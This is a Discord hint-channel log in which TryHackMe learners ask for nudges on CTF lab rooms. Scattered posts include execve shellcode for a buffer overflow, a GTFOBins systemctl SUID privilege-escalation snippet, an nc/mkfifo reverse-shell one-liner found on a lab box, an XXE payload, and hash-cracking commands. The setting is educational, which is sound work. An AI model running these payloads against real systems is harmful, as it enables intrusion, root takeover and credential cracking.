#room-hints
I am trying that now
Also stick to one channel at a time in future
i told him to come here since he only wanted a hint 🤓
@final mortar
Yes sorry, someone told me that this one would be better
I did say "in future", but ok
@eager folio Yeah, it's all right. If you are not sure about something in future, read the desc 🙂
yes sorry
is it ok to give the ip address of the server i am working on here or do i have to hide it ?
Nothing to apologize for
@eager folio It's all right
don't know what else to try in my request....
@eternal brook guys anyone really stuck?
I get that when I try to connect
is ssh running on port 22 ?
Wrong username = connection closed
@final mortar that would be connection refused, rather than closed
Ok so I tried every username. The only one that asks me for a password is root. But the problem is that I never had to find a password in the room before... I don't know why I can't understand what is asked and I start feeling dumb
You're not meant to be asked for a password
Did you read the file on the share?
It gave you some names
Unix usernames are always lower case
Do you mean "Working From Home Information.txt" ?
I am reading everything again and I am on it now, there is no username given in this file, am i supposed to find one using the names ?
Ok it was it
thank you for your help
I have had a lot of difficulties for something pretty easy in the end, sorry for the trouble on such an easy thing
no sorry necessary, just learn from the experience
I'll do
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
i am doing binex, i've found that i can overwrite the rbp which i think is the return address after a called function finishes, so if i can write my shellcode in the stack and make rbp point to an address in the stack which is the start of my shellcode would it work or should i try smth else
i am trying to learn more on binary exploitation
that sounds good to me
there are some great rooms to learn binary exploitation and RE
yeah i've seen that tryhackme has a lot of binary exploitation rooms which is good for me to learn
I'm stuck at Task 2 - /room/scripting. I'm just trying to make a basic connection to the port and waiting for a response but nothing happened. Running nmap to make sure what ports are open gives me this:
given that the task talks about 3010 I'm assuming this is where I want to connect
```python
import socket, sys

if len(sys.argv) != 3:
    print("Usage: python3 socket.py [ip_address] [port]")
    sys.exit()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
print("Connecting to " + sys.argv[1] + ":" + sys.argv[2] + "...")

try:
    message = '1'
    print('sending ' + message)
    s.sendall(message)
    amount_received = 0
    while amount_received <= 1:
        data = s.recv(32)
        amount_received += len(data)
        print(': ' + data)
finally:
    print("Closing...")
    s.close()
```
and for some reason yesterday this script was working. I only changed the hard coded port to int(sys.argv[2]) and for that I started getting this:
i'm so lost

you're giving it a string, it doesn't take strings as an argument
either encode it or make it a byte object before sending it
Bytes objects are b'
ok now i'm really confused
http://<machines_ip>:3010 this page wasn't working yesterday
unconfuse thyself
alright now that I can see the page do I need to code so the script gets the html data?
haven't done that specific room so i don't actually know what you need to do
I'm assuming I have to send HTTP headers
i've written this
```python
offset = 608
rbp_value = b"\x78\xe0\xff\xff\xff\x7f\x00\x00"
shellcode = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f \xb0\x3b\x0f\x05"
payload = b"x\90"*(608-len(shellcode)) + shellcode + rbp_value
print(payload)
```
but rbp has 0x395c5c7830395c5c instead of the rbp_value
0x395c5c7830395c5c has some \x90 but in a string format
I just don't get why some tutorials on sockets don't need to encode. And it actually worked for me yesterday without doing it (or didn't and it didn't work because of that)
Might be different versions 🤷♂️
but anyway it works now, now I just need a way to make it functional
Hey, for the brooklyn 99 room, i completed the room in 2 different ways, but i found there is a third created user "amy". is there a third way to get inside the room that involves that user?
Hey, I'm doing the alfred room and I have switched shells but I am unable to input any commands and it is just blank
Have you pressed enter a few times to make sure the prompt is there?
(also screenshots would help)
Thanks :D
Gotta transfer it from a vm and its taking its time
You can open discord in the browser of your vm ;)
Yeah I was just avoiding it because I'd have to sign in
Yeah I understand
VPN IPs and Machine IPs are safe here!
The payload isn't the one you selected
You tried to use the windows/meterpreter payload but that one has used the generic/shell_reverse_tcp
:D
what is wrong with this? Am i being dumb or something?
.\launcher.bat
uh
nah same result
yeah so i did the full path
Oh shoot that's for meterpreter
Do you have meterpreter session?
Are you sure the launcher.bat is in the same directory as you
i dont
and are you sure you typed the full path correctly
I'm sure to use .\ you need to be in a meterpreter session
Type the path and name of the batch file, and press Enter: C:\PATH\TO\FOLDER\BATCH-NAME.bat
What's the contents of launcher.bat
it looks like something got messed up in there
because it's echoing out errors from the commands ran in the launcher.bat
anyone know why this python code doesn't print "test"?
Any errors @green prism
Probably can't get the connection
=/=
ah yes fira code
Not equal to
@trim haven Yes, I know... but I mean, is it the actual syntax of the language?
Oh haha!
Happens to the best of us
@white salmon See it errors if it can't run it
And as it was hanging it wasn't the issue
As I'm sure an1me has it installed
<3
sorry if I interrupt somebody but why doesn't it execute even tho I run it as sudo
You're not executing it
./filename to execute it
You're checking the permissions of it
Okie
You're still not running it.
i run chmod
yeah
ls states information about the file
that's why i checked them with ls -l
You're adding a SUID binary too
i want to set suid
i do not want to execute it
(btw the SUID binary hasn't been set)
Also why are you trying to add an SUID binary to it
He was asking why the chmod doesn’t execute
run the command i inputted which clearly says chmod
James answered you earlier
u+s
yeah
All I see is +s
Just do chmod 755
@trim haven wdym ?
ignore that
@trim haven I want to try to escalate privs on my own system since I am not capable of doing so on Vulnversity
well
I used a bash script
so technically yeah
```sh
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
```

So you have to play around with the way you're getting the information you need
hm ok
@tidal sedge

Also, I dunno if you can actually put the SUID bit on the regular systemctl binary
From what you just pasted, I can tell you're trying to use the GTFOBins exploit for systemctl
and if you read, it says to make a local copy.
sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'
Then this doesn't belong in #room-hints
@hollow fox You've been doing it wrong the whole time, please re-read gtfobins.
and follow the instructions
ok
I dont get it
but I also modified the payload
@tidal sedge but in ... ?
@white salmon
Are you doing this for a THM room, or are you just trying to learn how to exploit your own machine?
If it's the latter, then sorry, it belongs in #general
I am doing it for vulnversity
so a room
but I thought it maybe does not work bc of the shell cuz it's nc so I tried to replicate it on my own machine
That won't work
Most exploits on machines are purposely set that way to be exploited
E.g. outdated versions
Technically the method he's trying to use could work on his own machine (if he hasn't touched the default Kali perms or anything)
since it's only merely abusing sudo privs
but you'd be getting root on your own machine (and creating a dangerous backdoor)
You have to perform the exploit on the Vulnversity machine.
is it a deal since I am not exposed to the internet ?
it'll work- you're just doing something wrong probably
yeah prolly
You're exposed to the internet when you're working with THM
you're generally safe, but it's good practice to not leave random exploits in your machine and stuff
yessir
how do I do this code theme in dc
the box around the code so it doesnt look ugly in dc
ykwim ?
thanks bud
```sh
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
```
so I pasted this in the shell
and it doesn't execute ExecStart
even tho there is /bin/systemctl enable --now
Again.
you didn't read the instructions clearly
It says to make a copy of /bin/systemctl
and then to give that copy the SUID bit you've been struggling with.
why that ?
sorry if I seem dumb or some shit
but it already has suid set
I don't get why I need to make a copy
You're not meant to copy it for vulnversity
Also possibly ^
GTFOBins isn't a deus ex machina- it needs specific conditions.
and only if those specific conditions are already met- then you can exploit whatever it is to privesc
hm
If you're still stuck, there's a lot of writeups for Vulnversity that you could research on and see if you can find out the best method for what you're trying to do.
but to exploit systemctl I need to write a service by myself right ?
that basically does anything but with root privs (bc of suid)
right ?
That's what the GTFOBins one does, it gives you a shell
I tweaked around the payload several times but it didn't execute once
Probably shouldn't be playing with the payloads.
https://tryhackme.com/room/networkservices | Task: 7 | question #6 : I try the command: "sudo tcpdump ip proto \icmp -i tun0" and it returns: "tcpdump: tun0: No such device exists
(SIOCGIFHWADDR: No such device)"
How do I know what I have to put to replace tun0 on my config ?
please
Which machine are you running the command on?
kali
Are you connected to the VPN inside of Kali*
Do you see a tun0 when you type ip addr
oh, so OpenVPN is running on your regular windows desktop?
yes
That's incorrect- OpenVPN should be running inside of the Kali VM.
ipaddr doesn't exist
you'll have to disconnect from OpenVPN on your windows computer, and run it on the Kali VM
ohhh i didn't know
thank you
thanks it works now
sorry but I have a lot of difficulties tonight...:
for question #6
it says that
you have to replace [local tun0 ip] with your tun0 ip
||Anyone could help me with reverse shell on mr.robot box? I am using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php for the 404 appearance and nc -lvnp 4444 to get the shell. But nothing happens. I open /404.php or any fake page on the host and nothing happens as if it won't trigger. I have set tun0 ip to the reverse shell script||
mrrobot room
@graceful magnet why don’t you change the page to something else first to confirm you can change it properly?
👀
Hi i need some help ( Networking Room ) to find the second common private home range
I entered but still giving me not correct
Google it 🙂
A - 10.0.0.0/8
B - 172.16.0.0/20
C - 192.168.0.0/16
@Korone Gang I did but still giving me not correct
the format is asking me to enter "xxx.xxx.x.x" so it should be the C address but it's giving me a not correct error
Well if the first one is 0.0 maybe the value for the second one is slightly different
first home default range is correct : 192.168.0.0 but for the second format xxx.xxx.x.x I'm not getting anything
you can find the answer you're looking for on google btw, it's a little hard to hint
try incrementing the third octet
Remember, 192.168.x.x is the most important part
the .x.x allows a much larger number of (sub)networks and machines just from those two separate octets
Typically, /24. That means the last octet varies for a network.
So what's the next network along from the first answer
any hints for Ra2 yet? found a bunch of stuff that looks interesting, but i'm having no luck with getting an initial foothold
Anyone on here good for a hint on Hackpark, task 4, question 3. I've found the service & confirmed it with walkthroughs but my answer keeps getting rejected...Any clues?
The answer was changed because it was wrong
You want the service name as given by sc query
Thanks!
Guys, in 'Lian_Yu' I'm stuck after finding the hidden directory || /island/2100||. I really don't know what I should do and the hint tells me nothing. Help plz 😋
can i confirm with anyone about anonymous-playground intended way. Just to confirm
sure
nothing there?
@honest yew ||taskbar browser right click on it ||
nothing
@honest yew ||right click on the browser ||
theres just one browser
@honest yew yes that browser
?
@honest yew ||reopened last session||
let me send a screenshot
Read rule 13
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
Is anyone available to give me some advice in approaching the beginner path scripting task 2 gotta catch em all
Is the task going to each webpage getting the data @verbal barn
yes it is, i have got a socket connection to first web page but unsure on how i am supposed to get the data to analyse it
Uhh off the top of my head I don’t know how to do it with sockets
But I used requests as it was much easier
aww ok, so its not set in terms of approach
i am free to try other methods, never covered sockets at uni, and the documentation wasn't that helpful
Mhm the task does say sockets
But in real life you won’t always use the common way
I’d recommend to research “BeautifulSoup” and “Requests”, if you’re set on using sockets, i can try and guide you but you’ll have to give me a few minutes to look at the docs
thanks man, ill give the research another go
:)
got the page sorted just gonna try the soup to identify the tag with the next port link
Need a hint in Anon Playground v2, stuck after getting access to zYdHuAKjP
🙂
Rule 13 @idle ruin
^ the room was just released so there won't be any hints/help for a while
only 8 users finished it so i'd hold with asking for help/hints
where to find the request with the set-cookie header in the burp suite room
anyone?
hello i'm having problems with task 21 from the room learn linux. i've already read the write-up for this room and the answer seems to be more simple than what i'm making it out to be. i've tried to make an environmental variable in two different places but none of them seem to run when i try to execute ./shiba2. anyone have any ideas?
Sometimes the permission denied is a bug from messing up before-hand. Terminate the machine, re-deploy and log in as shiba2. Perform the task again, make sure you're not touching a file called $test1234 as it is not required. If there are any more issues ping me :)
@trim haven thank you for helping 🙂 i've already tried that and this is the full screenshot to show i've terminated the previous tries and redeployed a new one
Do you mind if I dm you? I'd rather not spoil anything here
sure, thank you
Can I have a hint in here https://tryhackme.com/room/ctfcollectionvol1
Challenge # 17 Sounding QR
I already made the sound very slow but still speech to text cannot guess it even myself haha
any hints?
hard to know how to hint on it @amber grail
@honest yew Have you solved it yet ?
If not I can provide you the cve you are looking for in the history
@amber grail It's not that hard really. I can tell you that it says two words , and the last word is 2 letters
@amber grail There are some audio transcription sites, can help you...
Awesome
Not really asking for a hint, just need to be pointed in the right direction on where I can learn about https://tryhackme.com/room/vulnversity privilege escalation task. I guessed at the correct SUID file that looked suspicious, but I don't know why it was suspicious and I know I need to change an environment variable, but where should I be looking to learn something like this?
@elder sand Linux enumeration scripts and just general snooping of possible hidden files used by users
you'd be surprised at how people try to hide text files and stuff purely through obscurity
@white salmon would an enum script get me access to root files such as the root flag?
No
Enum scripts look for things on a system that could be possibly used for privilege escalation :3
some of them it depends, you should google them see what you can find
That's what I figured. I was just wondering a good place to learn this sort of privilege escalation?
Payload all the things might help
but there are automation tools such as linPEAS and winPEAS
Thanks! I'll take a look at these
@elder sand I just completed that one, I will say, I wouldn't have known about part of it, without the help of the walkthrough. I realized the one to go for, but didn't realize how to build it. Don't feel bad if you need to use a walkthrough, if you learn 🙂
smashing my tiny brain against the Anonymous Playground 😄 good stuff on this one 😄 every time I think I found something new, it makes even less sense
@untold tartan yeah I looked at a few, just need to understand these techniques so I don't have to rely on a walkthrough.
@elder sand if you find something that helps outline that, share if you don't mind, because I had no idea it was possible >.>
I mean, I guess I did, just not the use in privesc
@untold tartan will do
Hrmm, working on the anonymous playground, it's... Yea.
Please bear in mind it's a new challenge room, and avoid discussing it here 🙂
Gotcha
hi can some help me in steel mountain
I recommend just asking the question straight away, rather than asking if anyone can help
i finished the box i just cant understand this Take a look at the other web server. What file server is running?
this question
Http File Server but it says incorrect
alright gotcha
woah finished it
thanks @stuck fractal is there any box that goes around windows ?
like learn linux
Not yet
ahh k
Hey guys.
In this linux challenge I am at question: Find the user which is apart of the "hacker" group and read flag 36.. But I dont understand that question. Know whats in the group file but what does this is apart of the "hacker" group mean?
kind of. u have user, groups and others
No, that's file permissions
and groups represent another level of rights
Please go and research Linux/Unix groups
ok
so there is more to it than just permissions
haha found it.
a little bit around the corner thinking. but yeah. ||look for a file owned by that group|| did the trick
james can i dm u about privilege escalation on overpass2, i already did it, just to confirm that was the intended way?
The intended way is fairly obvious?
Like... Should be staring you in the face once you log in
guess I used an unintended way too 😅
DM @white pike @solid patrol
Stuck on the final stage of Anonymous Playground 2. It definitely highlighted my need to understand R2 better. Yikes.
Hi, please don't ask for help or hints yet as it's still a new challenge box
I'm not asking for help, just making a comment. No worries.
Then I'd recommend a different channel really
I just won't make comments, really.
hey @steep jetty can i dm you regarding anon playground
!rule 13
Guys can anyone help out with a lil trouble ? What to do in case msf tells to forceexploit ?
Well am in bolt CMS and the msf exploit throws an error
Then you might be using the wrong exploit
Na am sure about the exploit because there was a check box about the exploit
Enumeration
Well there is a reference but it's incorrect
This exploit is available only for the latest version
Hence the cms should be the same version as well
But it isn't taking that as an answer.
Yes it is 
anyone around done jigsaw 2?
have a specific question
please
@shut pollen if you're talking about bolt I ended up bruting it
on bolt? I missed it then
Yeah it's there
but lets be honest it took about 5 guesses and only cos its higher than I would have expected
But msf won't let me have a session
so anyone for jigsaw2?
Well, if the exploit is for "the latest version" then it's not going to be the right one @shut pollen
what is your question?
and it might be better to ask in #room-help if you want more than a hint
well I am pretty sure I know what to do but I tried every combination and nada
What's the username for bolt || admin || or || jake || ?
Try everything
Yeah did that
If none were good then reread, it's there
You'll find it so obvious when you got it xd
I got the username
```
[*] Started reverse TCP handler on <My IP>:4444
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target is not a Bolt CMS application. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
```
It's definitely not the latest version
This is the issue
It's not being detected as bolt, so something is wrong here
Check your settings
Check your VPN
anyone prepared to check syntax on jigsaw2 with me just in case I have missed something, though I have tried various tools for the job
If it was supposed to be done with metasploit... then how th did I finish the room?? o-o
Used a lower version than the room's CMS
@gaunt herald exactly what confused me about the cms version question.... (not spotting it on the page)
It's there, if you keep looking
not going back to it 😄 the whole box took like 20 minutes
Metasploit is updated man.
There's really nothing wrong with the room
By enumerating harder
definitely nothing wrong with it
Hence the cms should be the same version as well
@shut pollen might wanna check everything again and pay attention to the web page 👀
Okay man 
Got the flag , still need the version 
Have you found the username and password?
Because if you have maybe you can use them somewhere on the website..?
Yeah
Hello everyone, I'm kind of stuck on this room:
task 4 step 8
@shut pollen Sometimes CMS users don't change default directories......
I'm able to connect to the smb service, however I'm not able to copy the .ssh directory on my local computer.
Are you using mget
Once I connected, I tried these commands:
```
smb: \folder> recurse ON
smb: \folder> prompt OFF
smb: \folder> lcd /local/source/directory
smb: \folder> cd remote/target/directory
smb: \folder> mput *
```
where \folder\ is .ssh\
None of those will get the files
Try looking at the documentation
Or use the help command
are these not to copy the files?
Do any of them pop up with a message saying Do you want to copy these files or something similar to it?
Well you're using the wrong command
I just tried your suggestion, typing " mget .ssh ~/Desktop"
all you need to do is go to the folder that has the things you want to download
and type mget [File Name]
To the directory that you ran the smb command to connect
yw
The privesc on Overpass 2, little hint I literally have no clue where to look
ls -lAh ~ @trim haven
That's a funky command, thanks I'll have a look
It's just ls -lah that excludes . and ..
Hi I'm doing the zth room
when i submit the xxe payload it says sorry, already taken
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY hack SYSTEM 'except://id'>]>
<root>
  <name>aaa</name>
  <tel>a</tel>
  <email>&hack;</email>
  <password>&test;</password>
</root>
```
Please 🙂 as I said in room-help
I have already done with nmap , gobuster, ftp
What exact step/task are you stuck at
I am stuck at the root flag question in the room "Overpass 2 - Hacked". I located the suid_bash binary but can't find a way past that. Any hints?
You can use that
There's just something you need to know about bash and suid, which you can find really quickly online
Thanks @stuck fractal
What date did Lola first start her photography? Format: dd/mm/yyyy
Is this buggy?
no possible answer for that
No it's not buggy
You need to do some maths
There's 2019 years worth of possible answers really. Or at least 1000 if you don't want to zero pad the year
any ideas where to look after doing scan on anonymous room
Sounds like a googleable question
I did , couldn't find something of avail
Which room are you doing rn
Overpass2
I did it with hashcat, I can tell you that way if you want
still you can find about jtr online, i just did
hash:salt > write in this format in hash.txt
hashcat -m 1710 -a 0 hash.txt rockyou.txt > then this command
Thanks @wraith tapir , I did it with john
I would like to know how tho, not very good with john
You save it in the format pass$salt
Then you use john --wordlist=/usr/share/wordlists/rockyou.txt --format='dynamic=sha512($p.$s)' toJohn
||room:ccpentesting task7.6 How do you show options in a specific category in metasploit? can't figure out the right command, I always thought it was 'info' but apparently it isn't||
hmm ok, thanks
@shut pollen tried this but didn't work....
hashcat -m 1710 -a 0 hash.txt rockyou.txt> then this command
@wraith tapir also tried this one too and it still didn't work
same problem here
@hollow arch for hashcat store the password and salt, in that order, separated by a colon (:) and use the command hashcat -m 1710 hash.txt /path/to/rockyou.txt
I also tried using the backdoor to get access to the machine and it's just stuck....no command works
Is this overpass2 tr0x01?
@trim haven yeah
You can't crack the hash?
@hollow arch you get the salt from the source code
Both the salt and the hash method are in the source code
Cult don't give answers please
yeah
Yeah
hey guys I am doing Lazy Admin challenge. I need to elevate privileges for the root account but I am
```
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Can you guys give me a hint
in addition to the creds I have a backup file on another account's home folder.
```perl
#!/usr/bin/perl
system("sh", "/etc/copy.sh"); #it is another reverse shell
---------
#copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
```
```
ps aux | grep mysql
mysql 954 0.0 10.8 546408 47248 ? Ssl 12:12 0:05 /usr/sbin/mysqld
```
I think since mysql isn't running with root's privileges it isn't possible to elevate privileges from that
Hi I am a bit stuck on room:metasploit task:5 #7
I have tried all the numbers.
I think you need help for this one you don't need hints
OK thanks
@unreal lake What's your issue..???
@unreal lake "What is the name of the column on the far left side of the console that shows up next to 'Name'?"
I got it, I just brain farted.
Thanks for your time guys
@unreal lake think i got caught out on it also 😉
Over thinking the question haha
can you give me a hint
Did you try and see if there’s credential reuse?
Or if you could overwrite the reverse shell that’s there?
need hint on anonymous flag2 anyone
`$ cat /etc/passwd | grep rice` I think that is what you mean. It outputs nothing.
I will try to connect and dump the contents of the database. I am having a technical problem atm be right back
That’s not what I meant
Passwd file doesn’t hold any credentials so that wouldn’t find anything even if there is credential reuse
I mean just try switching users with that password and see if any of the users are using it
Did you check your Sudo permissions as well?
can I get a small hint on the privilege escalation process of the "Daily Bugle" machine? currently I'm the "Apache" user and I've tried:
- Seeing sudo permissions (sudo -l)
- SUID files
- SGID files
- Processes/Services running (at best of my ability, as I'm new to linux I rarely know what is suspicious or not)
- Trying to login with the found and common passwords on the other users
- Checked the cron jobs (none sus running)
- Checked many folders for uncommon files
- Kernel known exploits
My current and only lead is the SMTP server and some hash I found on the mysql database (got the credentials from the joomla configuration file), but it feels like I'm chasing down the rabbit hole as none of those leads are leading anywhere.
@oblique cliff ohhhhhhhhh I wasn't in the sudo group so I thought to myself there is no need to check for sudoers.
Thank you I got root 🙂
Usually users aren’t in the Sudo group. But you should always check your Sudo permissions anyway 🙂
No problem
@white salmon heya did you try to crack that hash?
I did
no
tried with hashcat
I know it's a MySQL5 hash
Im gonna try again in case I messed the command
Can someone dm me for anonymous playground i need some help for python script and i’m not sure what i should do
Ok thanks I'll do that @oblique cliff
(I was actually doing that rn for the 3rd time kek)
There should be interesting stuff there
i feel really stupid right now, have all answers for googledorking room, except for Task2 Question1 about crawlers, any hint on that lol
If I remember correctly the answer is in the blurb in the beginning of the task
ah lol found the one word i had not tested yet 🙂
hey guys
I'm currently on the Owasp Juice Shop Room
I just got to Task 5, and I have no clue how to solve it
I know I could look for the answer online, but I was hoping to first get some hints before I try that
I am quite a beginner, so sorry if the answer is easy, but I have no clue on how to go about doing this.
@wind fog the hard part of that question is finding Jim's identity
the difficulty of finding his identity depends on whether you watched movies like star wars, star trek...
IIRC don't you have to use LFI for that task?
Star trek? What's that got to do with this?
¯\_(ツ)_/¯
research everything jim posted then relate to my hints
And what's his email? How do I find that?
you need to enumerate the database
you don't have to go that hard to find Jim's identity, just read the comments on the articles posted
oh wait that bit might come later but you have to look around for info on Jim
yes christ
I tried looking at a walkthrough online
what the hell is any of this stuff?
the difficulty went from 0 to 100 in about 1 task
Yea this room is kinda difficult
tbh finding Jim's identity doesn't have to do with technical skills
but with research skills
wdym, like on google?
yes
or can I find it on their site?
if you saw Jim's comments and related them to star trek
all you had to do was
search
"jim star trek"
what Jim comments are you referring to?
on the articles
articles?
click on a product
there was an even more evident way through the administration page, which pointed Jim's address to some place on another planet
okay, I am stuck on hackpark, task 4 question 3 (I have completed the whole box, flags and all), however the phrasing on "abnormal Service" is screwing with me
I've tried putting this in every way I can think of and it's not accepting it. am I missing something obvious
need nudge on Anon Playground v2, found ||hidden webdirectory|| now, enumerate, bruteforce ?
@keen willow What are you brute forcing
???
sorry my b
@verbal wedge nothing, but asking to, maybe ||ssh with potential users (operatives)||.
good idea
@white salmon Don't use that word here, it's a slur.
@wind fog Please change your username to something more appropriate for an educational environment.
@verbal wedge really? they are 20 and what dict to use, rockyou? god my pc would kill me
lesson learned, I apologize, just re-read through the rules. I'll be more cautious next time.
Thanks
Can I have a hint too on Anon Playground v2? Been thinking of a lot of patterns that make "zA->a" work but no luck yet...
Hi @steady stratus I am doing malstrings room, I have completed all but Task2 #1 & #2, can you please give a hint, Thanks
@mint parcel you got initial foothold ?
@keen willow not yet
yeah lol, already 3h thinking about this translation
Good luck!
"Try harder" i guess 😆
You got this
Strings are values such as text, there's a lot of gibberish like @.data or SVWP like in the screenshot
Look for values that form words and sentences @gritty pond
any hint on Anonymous. i got Secret string. Any help what to do with it and next. Tried some replacement but not working
@mint parcel Can you see a pattern in both the strings , ||lowercaseUppercaselowercaseUppercase................. ||
@white salmon i think i've got it lol... this pattern was pretty obvious, but what to do with it... that's the trick
@mint parcel play with it now then
@keen willow gave a good hint too up in the chat 😄
Oooo room maker giving out hints 👀👀
Yeet
No hints unless room maker says it ok 
I'd like a hint on the Blue room Task 4: Cracking. I'm curious what in the pw hash would specify it as a particular hash format. I went to md5hashing.net and used all and it found none. I was stepping thru each one. I deleted the Jon part of it, but now... ?
Context
You got it from Windows, windows passwords are hashed using a specific algorithm
It seems to me that Admin:500 is a user and id#. So Guest:501 and Jon:1000 are as well. So the hash begins with the : or after?
The hashes are all the hex
I searched for windows hashing algorithm and it says md4
oh...goody
But it's not MD4
There's two of them, one of the hashes is normally blank though
the : is the separator for different fields in the hash dump
Could need a hint for the ||bof|| part on Anonymous. Got the bof working, but the ||setuid|| to id ||1337|| doesn't work, because the partition is mounted with ||nosuid||
So I got no permission 🤔
Tried it, doesn't work for me.
strace output line: ||setuid(1337) = -1 EPERM (Operation not permitted)||
the ||suid|| of the binary is dropped at the start : /
Another ||mitigation I had to use was not to use the address of the start of the function but the next address in the function. Idk why it worked but it did, probably because of bad characters.|| Someone smarter than me can tell why it works.
@white salmon both the strings
@keen willow ||string1::string2||
Hello, I am new to TryHackMe. I am at Task3 #6. DarkStar7471 has a video that shows the answers but I can't get the nmap vulnerability scripts to work properly. vulscan not at all, vulners I get some output but nothing that would give me the answer, vuln doesn't give me the output it does in the video even with the same input.
I am not sure what I am doing wrong. If someone wouldn't mind helping I would greatly appreciate it.
Task 3 #6 Nmap
Screenshots?
Sure, one moment
@keen willow pattern is co0l.. Got it!!!
I am at Task3 #6 So this is kind of vague
There's lots of rooms
And many of those have a task 3 question 6
@real rock
Just do a general vuln scan
That's what I get with vuln
I typed it letter for letter as DarkStar does but our outputs differ
Why did you put rpnmap.nmap there?
That's what he does.... to output it to a file that can be referenced later
Ill do it again with that portion
without*
But there's nothing telling nmap to put it into a file there, that's the issue
hi all.. if I have a salt and a hash... how do i use john to bruteforce with a dict? Do i need to combine the salt and hash into one file? How do I know which format to use?
I know for a fact you can find that answer on google
yea i've been looking and tried what I found but got no joy with JTR
@oblique shuttle https://github.com/magnumripper/JohnTheRipper/issues/2125
So I am trying to troubleshoot it still... I am noticing differences trying a verbose scan to see if I can see more on what might be going wrong?
I can't work out why that ends in a question mark. What's the question?
are you using kali @real rock?
Was I not supposed to?
Wee woo wee woo
...
lol be nice
...
@real rock Port scanning machines over the internet is still a grey area. If you make anything fall over from it, it's definitely illegal. This is why you need to be careful.
the -oN is important in that command @real rock, not having it changed the filename into a host name
it's a simple mistake to make, probably good that the file name wasn't fbi.gov though 🙂
no, what you did was tell nmap to scan 2 hosts
Oh wait... did I scan an IP then send it to a IP address?
@real rock No, you scanned
the one you wanted, 10.10.X.Y and the one that James just highlighted
leaving out the -oN meant nmap assumed everything at the end was a target
we were all noobs once
😆
but it's a good lesson to learn if you learn from it, parameters are important 🙂
have a look in /usr/share/nmap/scripts
all the scripts that nmap can use are in there
so the --script is telling nmap to run a selection of these
exactly, so if for example you wanted to run all the smb related scripts you could do --script smb-*
Gotcha... so when I ended up looking online and saw a script it was correct for that person but not my scripts... so in the future when I research I can use the script for syntax purposes but I might need to change where the script is pointing to based on my library?
so vuln worked for them but I noticed I dont have that in my scripts
no, not exactly, vuln is a little different, it runs all the scripts that have that keyword in them, like a wildcard
so the syntax is fine
oh ok
if you run the command like Dark did in the video you should get the same result
nmap -A -T5 -sV --script vuln -oN rpnmap.nmap 10.10.x.y
just don't leave any of it out till you understand all of it
Ok, now that I have been straightened out... 😛
Does it mean something if it gets stuck on NSE Timing: About 98.89% done; ETC 15:31 (0:00:01 remaining) indefinitely?
This was my first issue before I start changing things trying to get it to work
started*
The timer isn't always 100% accurate
I looked online and it says to press "d" for debugging mode but that really doesn't help
that usually means that one of the scripts that is running has gotten stuck waiting on a response or that something has broken/timed out somewhere - i've gotten it once or twice, usually it just means finding the 'bad' script and leaving it out
Ok
Nmap script scans take forever
well the 'd' would be how you find out what's stuck
but yeah, some scans can take longer than you think they will
Gotcha, so if I am concerned that it's broken, d will tell me where it's at (presumably what is causing the hang up) and once I know I can look up how to leave the "bad script" out then rerun.
Otherwise wait a bit cause it can take a while.
Thank you all for all the help I know I am spitting all kinds of questions out
just so - for most rooms here that are designed for learning hacking, nmap will work fine given a little time
I never finished DarkStar's video to the end (was trying to do it myself) just now finished it and I see his scan didn't even give him back a report to answer the last question. He said sometimes that just happens. A little annoyed I couldn't do it myself though.
Thanks I will keep working at it to become more proficient with the tool.
I have no IT experience before a few months ago. There is still so much I don't know
Then I found this site about a week ago
TryHackMe is AMAZING!
that's the way @real rock, keep at it and it'll come, before you know it this stuff will be easy and you'll find the next layer of tricky things to get stuck into
hey lads
can someone help me with webappsec101 room?
I'm on task 4 atm, and stuck on this question
Don't ask to ask, feel free to formulate your question with info as a whole and just ask it
and somebody will answer you
The hint is to look at a git file containing a bunch of names, but I'm unsure how this would help me.
Am I meant to brute force the site using all the names to find a user? Or is there some other way?
That are logged in
It gives you the methods that you should try using in the task itself
wdym?
If it tells you that brute forcing is a method, and the hint literally gives you a list of names
what do you think?
so I should try brute force it then?
alright, except how would I know which are logged in, cause I would need to brute force the password too.
Well, when it says "logged on" it's a bit misleading
it's really just saying "what's another existing username that you can find on the server"
You have to use your own sleuthing and enumeration skills to see if you can find it.
ah, alright
Like I said, the task itself already gave you some methods on how to do it.
There's a writeup if you're not sure about the method exactly.
no not really, but I generally like to try before looking at writeups
Well, the task itself does give you the methods, although it's just not for the same desired result (you're not bruteforcing passwords, you're bruteforcing usernames)
but you have to figure out how to do that exactly
.
@sick sun #bot-commands
Can anyone help with intro to x86-64 task 4 number 1. I have analysed the binary and got the correct answers for other questions but this particular question keeps giving wrong answer
Oh goodness
Yeah sure
@thin sorrel what's the question sorry?
Solved it thanks
can anyone help me with networking task 1 6
Oh awesome
lol jabba sweating bullets
I used the decimal @trim haven
I was getting ready to @ you Bob
Why didn't hex work tho
